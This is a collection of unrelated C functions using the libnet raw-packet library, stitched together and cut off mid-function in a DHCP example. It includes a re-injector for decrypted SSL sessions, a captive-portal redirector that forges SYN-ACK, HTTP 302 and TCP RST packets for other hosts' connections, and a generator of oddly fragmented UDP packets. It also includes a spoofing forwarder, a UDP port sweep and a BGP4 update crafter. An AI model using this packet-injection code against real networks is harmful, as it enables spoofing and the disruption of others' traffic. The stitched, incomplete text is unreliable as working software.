// Handles decrypted data from libdssl static void data_callback_proc(NM_PacketDir dir, void* user_data, u_char* pkt_payload, uint32_t pkt_size, DSSL_Pkt* last_packet) { libnet_ptag_t tcp, ip, ethernet; register libnet_t *libnet_c; TcpSession *sess = (TcpSession*) user_data; uint32_t bytes_written, bytes_to_write; u_char* payload_ptr; FakeSessionState *mySession = (FakeSessionState*) sess->user_data; // Initialise byte counter and payload pointer bytes_written = 0; payload_ptr = pkt_payload; tcp = ip = ethernet = 0; if (config.loglevel > 0 && !config.daemon) { switch(dir) { case ePacketDirFromClient: fprintf(stderr, "\nC->S: %d bytes\n", pkt_size ); break; case ePacketDirFromServer: fprintf(stderr, "S->C: %d bytes\n", pkt_size ); break; default: fprintf(stderr, "\nUnknown packet direction!"); break; } } // Get libnet context libnet_c = mySession->ln; // Send handshake if necessary if( mySession->handshakeSent == 0 ) { sendTCPHandshake( libnet_c, sess, mySession ); mySession->handshakeSent = 1; } // Split pkt_payload into a 1460 byte MSS while( bytes_written < pkt_size ) { // Work out how many bytes to write on this pass bytes_to_write = ( ( pkt_size - bytes_written ) < 1460 ) ? ( pkt_size - bytes_written ) : 1460; tcp = libnet_build_tcp( ( dir == ePacketDirFromClient ) ? sess->clientStream.port : ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ), /* source port */ ( dir == ePacketDirFromClient ) ? ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ) : sess->clientStream.port, /* destination port */ ( dir == ePacketDirFromClient ) ? mySession->clientSeq : mySession->serverSeq, /* sequence number */ ( dir == ePacketDirFromClient ) ? mySession->serverSeq : mySession->clientSeq, /* acknowledgement num */ TH_ACK, /* control flags */ 32767, /* window size */ 0, /* checksum */ 10, /* urgent pointer */ LIBNET_TCP_H + bytes_to_write, /* TCP packet size */ payload_ptr, /* payload */ bytes_to_write, /* payload size */ libnet_c, /* libnet handle */ 0); /* libnet id */ // Increment count of bytes written bytes_written += bytes_to_write; if( dir == ePacketDirFromClient ) mySession->clientSeq += bytes_to_write; else mySession->serverSeq += bytes_to_write; // Increment payload_ptr payload_ptr += bytes_to_write; if (tcp == -1) { if (config.daemon) syslog(LOG_ERR, "Can't build TCP header: %s", libnet_geterror(libnet_c)); else fprintf(stderr, "Can't build TCP header: %s.\n", libnet_geterror(libnet_c)); } else { ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H + bytes_to_write, /* length */ 0, /* TOS */ 54609, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ ( dir == ePacketDirFromClient ) ? sess->clientStream.ip_addr : sess->serverStream.ip_addr, /* source IP */ ( dir == ePacketDirFromClient ) ? sess->serverStream.ip_addr : sess->clientStream.ip_addr, /* destination IP */ NULL, /* payload */ 0, /* payload size */ libnet_c, /* libnet handle */ 0); /* libnet id */ if (ip == -1) { if (config.daemon) syslog(LOG_ERR, "Can't build IP header: %s", libnet_geterror(libnet_c)); else fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(libnet_c)); } else { ethernet = libnet_build_ethernet( ( dir == ePacketDirFromClient ) ? config.cap[capindex]->dst_interface_mac : config.cap[capindex]->src_interface_mac, /* ethernet destination */ ( dir == ePacketDirFromClient ) ? config.cap[capindex]->src_interface_mac : config.cap[capindex]->dst_interface_mac, /* ethernet source */ ETHERTYPE_IP, /* protocol type */ NULL, /* payload */ 0, /* payload size */ libnet_c, /* libnet handle */ 0); /* libnet id */ if (ethernet == -1) { if (config.daemon) syslog(LOG_ERR, "Can't build ethernet header: %s", libnet_geterror(libnet_c)); else fprintf(stderr, "Can't build ethernet header: %s.\n", libnet_geterror(libnet_c)); } else { if (libnet_write(libnet_c) == -1) { if (config.daemon) syslog(LOG_ERR, "write error: %s", libnet_geterror(libnet_c)); else fprintf(stderr, "Write error: %s.\n", libnet_geterror(libnet_c)); } } } } libnet_clear_packet(libnet_c); } }
int main(int argc, char *argv[]) { int c; libnet_t *l; char *device = NULL; char *dst = "2.2.2.2", *src = "1.1.1.1"; u_long src_ip, dst_ip; char errbuf[LIBNET_ERRBUF_SIZE]; libnet_ptag_t ip_ptag = 0; u_short proto = IPPROTO_UDP; u_char payload[255] = {0x11, 0x11, 0x22, 0x22, 0x00, 0x08, 0xc6, 0xa5}; u_long payload_s = 8; printf("libnet 1.1 packet shaping: IP + payload[raw]\n"); /* * handle options */ while ((c = getopt(argc, argv, "d:s:tp:i:h")) != EOF) { switch (c) { case 'd': dst = optarg; break; case 's': src = optarg; break; case 'i': device = optarg; break; case 't': proto = IPPROTO_TCP; break; case 'p': strncpy((char *)payload, optarg, sizeof(payload)-1); payload_s = strlen((char *)payload); break; case 'h': usage(argv[0]); exit(EXIT_SUCCESS); default: exit(EXIT_FAILURE); } } /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ device, /* network interface */ errbuf); /* error buffer */ printf("Using device %s\n", l->device); if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } if ((dst_ip = libnet_name2addr4(l, dst, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", dst); exit(EXIT_FAILURE); } if ((src_ip = libnet_name2addr4(l, src, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", src); exit(EXIT_FAILURE); } /* * Build the packet */ ip_ptag = libnet_build_ipv4( LIBNET_IPV4_H + payload_s, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ proto, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ ip_ptag); /* libnet id */ if (ip_ptag == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte IP packet; check the wire.\n", c); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
static int http_redirector(const char *packet_content) { /******************************************************************* * here we use TCP * when we recv a SYN=1,ACK=0 packet, we just send a syn=1,ack=1 packet * that contains nothing * then we push a packet taht contains * HTTP/1.0 302 Found * Location: http://192.168.0.1/ * connection:close * * please visit http://192.168.0.1 * and then we reset the connection * ****************************************************************/ struct tcphdr * tcp_head; struct udphdr * udp_head; struct ether_header *eptr; //以太网帧 struct iphdr *ip_head; if (packet_content == NULL) { return 1; } eptr = (struct ether_header *) packet_content; ip_head = (struct iphdr *) (packet_content + sizeof(struct ether_header)); //获得ip数据报的内存地址 //非 enable 的客户端,现在要开始这般处理了,重定向到 ... 嘿嘿 redirector_ip = inet_addr(conf.portal_server_ip); portal_dev = inet_addr(conf.portal_dev); if (ip_head->daddr == redirector_ip || ip_head->daddr == portal_dev) { return 1; } if (ip_head->saddr == redirector_ip || ip_head->saddr == portal_dev) { return 1; } struct in_addr tmp; tmp.s_addr = ip_head->daddr; if (search(ip_head->daddr) == 1) { printf("dip:%sok\n", inet_ntoa(tmp)); return 1; } tmp.s_addr = ip_head->saddr; if (search(ip_head->saddr) == 1) { // printf("sip:%sok\n", inet_ntoa(tmp)); return 1; } memset(httphead, 0, sizeof(httphead)); sprintf(httphead, "HTTP/1.0 302 Found\n" "Location: http://%s:5246/test/auth.jsp?sip=%s&portal_dev=%s&smac=%s\n" "Connection:close\n\n" "<html>\n\t<head>\n\t\t<meta http-equiv=\"Refresh\"content=\"0 ; " "url=http://%s:5246/test/auth.jsp?sip=%s&portal_dev=%s&smac=%s\">\n\t</head>\n</html>\n", conf.portal_server_ip, inet_ntoa(tmp), conf.portal_dev, smac, conf.portal_server_ip, inet_ntoa(tmp), conf.portal_dev, smac); // conf.authserver, inet_ntoa(tmp), conf.gateway, smac, // conf.authserver, inet_ntoa(tmp), conf.gateway, smac); printf("httphead:%s\n", httphead); //Retrive the tcp header and udp header tcp_head = (struct tcphdr*) ((char*) ip_head + ip_head->ihl * 4); udp_head = (struct udphdr*) ((char*) ip_head + ip_head->ihl * 4); //初始化libnet,每个线程一个 libnet ;) init_thread_libnet(); // http 重定向 if (ip_head->protocol == IPPROTO_TCP && ntohs(tcp_head->dest) == 80) { u_int8_t tcp_flags = ((struct libnet_tcp_hdr *) tcp_head)->th_flags; if (tcp_flags == TH_SYN) { /******************************** * 对于这样的一个握手数据包 * 我们应该要建立连接了 * 回复一个syn ack 就是了 *********************************/ // here we just echo ack and syn. libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), tcp_head->seq, ntohl(tcp_head->seq) + 1, TH_ACK | TH_SYN, 4096, 0, 0, 20, 0, 0, libnet, 0); libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0, ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0); libnet_write(libnet); libnet_clear_packet(libnet); libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), tcp_head->seq, ntohl(tcp_head->seq) + 1, TH_ACK | TH_SYN, 4096, 0, 0, 20, 0, 0, libnet, 0); libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0, ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0); } else if (tcp_flags & (TH_ACK | TH_SYN)) { /********************************************* *现在是发送页面的时候啦! *********************************************/ int SIZEHTTPHEAD = strlen((const char*) httphead); libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), ntohl(tcp_head->ack_seq), ntohl(tcp_head->seq) + ntohs(ip_head->tot_len) - 40, TH_ACK | TH_PUSH | TH_FIN, 4096, 0, 0, 20 + SIZEHTTPHEAD, httphead, SIZEHTTPHEAD, libnet, 0); libnet_build_ipv4(40 + SIZEHTTPHEAD, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0, ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0); } else if (tcp_flags & (TH_FIN | TH_RST)) { /********************************************************* *好,现在结束连接! ********************************************************/ libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), ntohl(tcp_head->ack_seq), ntohl(tcp_head->seq) + 1, TH_ACK | TH_RST, 4096, 0, 0, 20, 0, 0, libnet, 0); libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0, ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0); printf( "------------------------------------------------------------------------link disconnect\n"); printf("smac:%s\n", smac); printf("sip:%sok\n", inet_ntoa(tmp)); } else { return 0; } } //其他 TCP 直接 RST else if (ip_head->protocol == IPPROTO_TCP) { libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source), ntohl(tcp_head->ack_seq), ntohl(tcp_head->seq) + 1, TH_ACK | TH_RST, 4096, 0, 0, 20, 0, 0, libnet, 0); libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0, ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0); } else if (ip_head->protocol == IPPROTO_UDP && udp_head->dest != 53) { //现在是 UDP 的时代了 libnet_build_udp(ntohs(udp_head->dest), ntohs(udp_head->source), sizeof(blank) + sizeof(struct udphdr), 0, blank, sizeof(blank), libnet, 0); libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_UDP, 0, ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0); } else return 0; libnet_autobuild_ethernet(eptr->ether_shost, ETHERTYPE_IP, libnet); libnet_write(libnet); libnet_clear_packet(libnet); return 1; }
int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT, u_short dPRT, int count) { libnet_t *l = NULL; libnet_ptag_t udp = 0; libnet_ptag_t ip = 0; char errbuf[LIBNET_ERRBUF_SIZE]; char *payload = NULL; u_short payload_s = 0, src_prt, dst_prt; u_long src_ip, dst_ip; int c, frag; if (!device) device = DEVICE; l = libnet_init (LIBNET_RAW4, device, errbuf); if (!l) { fprintf (stderr, "libnet_init() failed: %s\n", errbuf); exit (EXIT_FAILURE); } src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) : libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE); dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) : libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE); src_prt = sPRT ? sPRT : SRC_PRT; dst_prt = dPRT ? dPRT : DST_PRT; if (count == 1) { payload = "\0\0\0\0\0\0\0\0"; payload_s = 8; } udp = libnet_build_udp (src_prt, dst_prt, (LIBNET_UDP_H + payload_s) * 2, 0, (unsigned char *)payload, payload_s, l, udp); if (udp == -1) { fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l)); exit (EXIT_FAILURE); } switch (count) { case 1: frag = IP_MF; break; case 2: frag = 0x2002; break; case 3: frag = 0x0003; break; } ip = libnet_build_ipv4 (20, 0, 1800, frag, 128, IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip); if (ip == -1) { fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l)); exit (EXIT_FAILURE); } c = libnet_write (l); if (c == -1) { fprintf (stderr, "Write error: %s\n", libnet_geterror (l)); exit (EXIT_FAILURE); } printf ("Wrote UDP packet; check the wire.\n"); libnet_destroy (l); return (EXIT_SUCCESS); }
int main(int argc, char *argv[]) { if(argc < 5) { printf("Usage: ./out device local_port remote_addr remote_port\n"); return -1; } char *interface = argv[1]; char errbuf[LIBNET_ERRBUF_SIZE]; libnet_ptag_t ip_tag = 0, tcp_tag = 0; u_short proto = IPPROTO_TCP; int packet_size; libnet_t *libnet_handler = libnet_init(LIBNET_RAW4_ADV, interface, errbuf); if(NULL == libnet_handler) { printf("libnet init failed: %s\n", errbuf); exit(1); } u_long dst_ip = libnet_name2addr4(libnet_handler, argv[3], LIBNET_RESOLVE); u_long src_ip = libnet_name2addr4(libnet_handler, "0.0.0.0", LIBNET_RESOLVE); fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); struct sockaddr_in addr; socklen_t slen = sizeof(addr); memset((void *)&addr, 0, slen); addr.sin_family = AF_INET; addr.sin_port = htons(atoi(argv[2])); inet_aton("0.0.0.0", &addr.sin_addr); bind(fd, (const struct sockaddr*)&addr, slen); u_char buf[BUF_SIZE]; ssize_t recvlen; while(1) { recvlen = recvfrom(fd, buf, BUF_SIZE, 0, NULL, NULL); tcp_tag = libnet_build_tcp( atoi(argv[2]), /* 源端口 */ atoi(argv[4]), /* 目的端口 */ 8888, /* 序列号 */ 8889, /* 确认号 */ TH_PUSH | TH_ACK, /* Control flags */ 14600, /* 窗口尺寸 */ 0, /* 校验和,0为自动计算 */ 0, /* 紧急指针 */ LIBNET_TCP_H + recvlen, /* 长度 */ buf, /* 负载内容 */ recvlen, /* 负载内容长度 */ libnet_handler, /* libnet句柄 */ tcp_tag /* 新建包 */ ); if (tcp_tag == -1) { printf("libnet_build_tcp failure\n"); continue; }; /* 构造IP协议块,返回值是新生成的IP协议快的一个标记 */ ip_tag = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H + recvlen, /* IP协议块的总长,*/ 0, /* tos */ (u_short) libnet_get_prand(LIBNET_PRu16), /* id,随机产生0~65535 */ 0, /* frag 片偏移 */ (u_int8_t)libnet_get_prand(LIBNET_PR8), /* ttl,随机产生0~255 */ proto, /* 上层协议 */ 0, /* 校验和,此时为0,表示由Libnet自动计算 */ src_ip, /* 源IP地址,网络序 */ dst_ip, /* 目标IP地址,网络序 */ NULL, /* 负载内容或为NULL */ 0, /* 负载内容的大小*/ libnet_handler, /* Libnet句柄 */ ip_tag /* 协议块标记可修改或创建,0表示构造一个新的*/ ); if (ip_tag == -1) { printf("libnet_build_ipv4 failure\n"); return (-4); }; packet_size = libnet_write(libnet_handler); //libnet_clear_packet(libnet_handler); } libnet_destroy(libnet_handler); }
int main(int argc, char *argv[]) { int c; char *cp; libnet_t *l; libnet_ptag_t t; u_char *payload; u_long payload_s; u_long src_ip, dst_ip; u_short src_prt, dst_prt; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 packet shaping: MPLS[link]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_LINK_ADV, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; payload = NULL; payload_s = 0; while ((c = getopt(argc, argv, "d:s:p:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; dst_prt = (u_short)atoi(cp); if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; src_prt = (u_short)atoi(cp); if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'p': payload = (u_char *)optarg; payload_s = strlen((char *)payload); break; default: exit(EXIT_FAILURE); } } if (!src_ip || !src_prt || !dst_ip || !dst_prt) { usage(argv[0]); exit(EXIT_FAILURE); } t = libnet_build_tcp( src_prt, /* source port */ dst_prt, /* destination port */ 0xffffffff, /* sequence number */ 0x00000000, /* acknowledgement num */ TH_SYN, /* control flags */ 32767, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + payload_s, /* TCP packet size */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_mpls( 29, /* label */ 4, /* experimental */ LIBNET_MPLS_BOS_ON, /* bottom of stack */ 0xff, /* ttl */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_mpls( 39, /* label */ 5, /* experimental */ LIBNET_MPLS_BOS_ON, /* bottom of stack */ 0xef, /* ttl */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_mpls( 59, /* label */ 6, /* experimental */ LIBNET_MPLS_BOS_ON, /* bottom of stack */ 0x0f, /* ttl */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_ethernet( enet_dst, /* ethernet destination */ enet_src, /* ethernet source */ ETHERTYPE_MPLS, /* protocol type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte MPLS frame; check the wire.\n", c); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char **argv) { int c, build_ip; struct timeval r; struct timeval s; struct timeval e; libnet_t *l; libnet_ptag_t udp; char *payload; libnet_ptag_t t; struct libnet_stats ls; u_short payload_s; u_long src_ip, dst_ip; u_short bport, eport, cport; libnet_plist_t plist, *plist_p; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1.0 packet shaping: UDP2[link]\n"); l = libnet_init( LIBNET_LINK, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } src_ip = 0; dst_ip = 0; payload = NULL; payload_s = 0; plist_p = NULL; while ((c = getopt(argc, argv, "d:s:p:P:")) != EOF) { switch (c) { case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(1); } break; case 'P': plist_p = &plist; if (libnet_plist_chain_new(l, &plist_p, optarg) == -1) { fprintf(stderr, "Bad token in port list: %s\n", libnet_geterror(l)); exit(1); } break; case 'p': payload = optarg; payload_s = strlen(payload); break; default: usage(argv[0]); exit(EXIT_FAILURE); } } if (!src_ip || !dst_ip || !plist_p) { usage(argv[0]); exit(EXIT_FAILURE); } udp = 0; #if !(__WIN32__) gettimeofday(&s, NULL); #else /* This obviously is not as good - but it compiles now. */ s.tv_sec = time(NULL); s.tv_usec = 0; #endif build_ip = 1; while (libnet_plist_chain_next_pair(plist_p, &bport, &eport)) { while (!(bport > eport) && bport != 0) { cport = bport++; udp = libnet_build_udp( 1025, /* source port */ cport, /* destination port */ LIBNET_UDP_H + payload_s, /* packet size */ 0, /* checksum */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ udp); /* libnet id */ if (udp == -1) { fprintf(stderr, "Can't build UDP header (at port %d): %s\n", cport, libnet_geterror(l)); goto bad; } if (build_ip) { build_ip = 0; t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_UDP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_ethernet( enet_dst, /* ethernet destination */ enet_src, /* ethernet source */ ETHERTYPE_IP, /* protocol type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); if (t == -1) { fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l)); goto bad; } } //usleep(100); c = libnet_write(l); if (c == -1) { fprintf(stderr, "write error: %s\n", libnet_geterror(l)); } else { fprintf(stderr, "wrote %d UDP packet to port %d\n", c, cport); // fprintf(stderr, "."); } } } #if !(__WIN32__) gettimeofday(&s, NULL); #else /* This obviously is not as good - but it compiles now. */ s.tv_sec = time(NULL); s.tv_usec = 0; #endif libnet_timersub(&e, &s, &r); fprintf(stderr, "Total time spent in loop: %ld.%ld\n", r.tv_sec, r.tv_usec); libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char *argv[]) { int c; libnet_t *l; u_long src_ip, dst_ip, length; libnet_ptag_t t = 0; char errbuf[LIBNET_ERRBUF_SIZE]; u_char *payload = NULL; u_long payload_s = 0; u_char marker[LIBNET_BGP4_MARKER_SIZE]; u_short u_rt_l = 0; u_char *withdraw_rt = NULL; char flag_w = 0; u_short attr_l = 0; u_char *attr = NULL; char flag_a = 0; u_short info_l = 0; u_char *info = NULL; char flag_i = 0; printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } src_ip = 0; dst_ip = 0; memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE); while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'p': payload = (u_char *)optarg; payload_s = strlen((char *)payload); break; case 'w': withdraw_rt = (u_char *)optarg; break; case 'W': u_rt_l = atoi(optarg); break; case 'a': attr = (u_char *)optarg; break; case 'A': attr_l = atoi(optarg); break; case 'i': info = (u_char *)optarg; break; case 'I': info_l = atoi(optarg); break; default: exit(EXIT_FAILURE); } } if (!src_ip || !dst_ip) { usage(argv[0]); goto bad; } set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w); set_ptr_and_size(attr, attr_l, 0x42, flag_a); set_ptr_and_size(info, info_l, 0x43, flag_i); /* * BGP4 update messages are "dynamic" are fields have variable size. The only * sizes we know are those for the 2 first fields ... so we need to count them * plus their value. */ length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s; t = libnet_build_bgp4_update( u_rt_l, /* Unfeasible Routes Length */ withdraw_rt, /* Withdrawn Routes */ attr_l, /* Total Path Attribute Length */ attr, /* Path Attributes */ info_l, /* Network Layer Reachability Information length */ info, /* Network Layer Reachability Information */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_BGP4_HEADER_H; t = libnet_build_bgp4_header( marker, /* marker */ length, /* length */ LIBNET_BGP4_UPDATE, /* message type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_TCP_H; t = libnet_build_tcp( 0x6666, /* source port */ 179, /* destination port */ 0x01010101, /* sequence number */ 0x02020202, /* acknowledgement num */ TH_SYN, /* control flags */ 32767, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ length, /* TCP packet size */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_IPV4_H; t = libnet_build_ipv4( length, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c); } if (flag_w) free(withdraw_rt); if (flag_a) free(attr); if (flag_i) free(info); libnet_destroy(l); return (EXIT_SUCCESS); bad: if (flag_w) free(withdraw_rt); if (flag_a) free(attr); if (flag_i) free(info); libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char *argv[]) { char *intf; u_long src_ip, options_len, orig_len; int i; libnet_t *l; libnet_ptag_t t; libnet_ptag_t ip; libnet_ptag_t udp; libnet_ptag_t dhcp; struct libnet_ether_addr *ethaddr; struct libnet_stats ls; char errbuf[LIBNET_ERRBUF_SIZE]; u_char options_req[] = { LIBNET_DHCP_SUBNETMASK , LIBNET_DHCP_BROADCASTADDR , LIBNET_DHCP_TIMEOFFSET , LIBNET_DHCP_ROUTER , LIBNET_DHCP_DOMAINNAME , LIBNET_DHCP_DNS , LIBNET_DHCP_HOSTNAME }; u_char *options; u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; u_char *tmp; // have to specify interface if (argc != 2) usage(argv[0]); intf = argv[1]; l = libnet_init( LIBNET_LINK, // injection type intf, // network interface errbuf); // errbuf if (!l) { fprintf(stderr, "libnet_init: %s", errbuf); exit(EXIT_FAILURE); } else { src_ip = libnet_get_ipaddr4(l);; if ((ethaddr = libnet_get_hwaddr(l)) == NULL) { fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l)); exit(EXIT_FAILURE); } printf("ip addr : %s\n", libnet_addr2name4(src_ip, LIBNET_DONT_RESOLVE)); printf("eth addr : "); for (i = 0; i < 6; i++) { printf("%x", ethaddr->ether_addr_octet[i]); if (i != 5) { printf(":"); } } printf("\n"); // build options packet i = 0; options_len = 3; // update total payload size 